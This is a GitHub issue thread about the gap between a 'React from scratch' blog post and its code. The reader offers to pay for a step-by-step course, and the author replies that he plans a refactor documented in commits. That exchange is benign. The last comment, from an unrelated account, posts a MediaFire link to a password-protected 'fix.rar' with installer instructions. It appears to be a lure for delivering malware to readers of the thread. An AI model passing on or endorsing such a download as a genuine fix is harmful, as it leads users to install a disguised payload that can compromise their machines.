### ISSUE TITLE
Would you consider revising your blog post with the full content of this library?

### ISSUE THREAD

**Issue by coolsoftwaretyler** [RobPruzan/react-scratch#1]
Hi @RobPruzan - I absolutely loved [your post about this library](https://www.rob.directory/blog/react-from-scratch).

I really wanted to follow along with the post and see these steps for myself in code. I knew there would be some exercises left to the reader, so I opened up this codebase alongside the post.

Unfortunately, there's enough drift between the post and this code base that I couldn't really do the thing I wanted: follow a step-by-step guide to building this codebase (mostly).

I get the sense that's *not* the intention of your post, so I hope this issue doesn't read as a complaint. Instead, I'd love to just encourage you to create a supplemental resource, or a course, or something else that does a deep dive on this code and walks through the process step-by-step.

In fact, I'd be willing to pay you at least $40 for a resource like that. I'd even pay in advance. This is about how much [Rebuilding Rails](https://rebuilding-rails.com/) costs, and it's one of the best books I ever read back when I was writing Ruby on Rails code. I think what you've done here could be like that, but for React.

I don't know you or your life or anything, so if that's not interesting to you, all good. But I wanted to write this to thank you for the very interesting read, for publishing this code base, and I wanted to let you know you have at least one paying customer ready to go on this one.

Thanks for putting this out there into the world. Have a great week!

**Comment by RobPruzan** [comment]
Thanks for taking the time to read it!

Yeah, I agree; the drift is a lot more than I intended before making the blog post. I mentioned it briefly in the conclusion, but a lot of the code I ended up writing is significantly more convoluted than it needed to be. I was only able to recognize some of the flaws/unnecessary bits after writing down all my thoughts. And at that point, it felt better to describe what my code was _really_ doing, not the literal step by step of the impl, for example:
-  I didn't recognize the `renderTree` in the code only needed to exist to track dependencies between components (the dependency tree I spoke about in the article), and because of that I ended up storing a bunch of unnecessary state in that tree that should have been in the view tree. Would of simplified things a ton

I think what I'll probably end up doing is something similar to this project that someone shared with me recently- https://github.com/eeue56/make-your-own-tea/pull/1 - which builds a small UI framework but documents it through commit descriptions. So instead of updating the blog, there's probably more alpha in refactoring the code to match the blog post, and linking what parts of the blog post match with the changes. 

Really appreciate the offer for paying, but I probably don't have enough time right now to make anything that's worthy of selling... I'll definitely ping you when/if I get to the refactor

**Comment by coolsoftwaretyler** [comment]
Makes sense! Good luck with whatever you build and I'll certainly be following to give it a read!

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
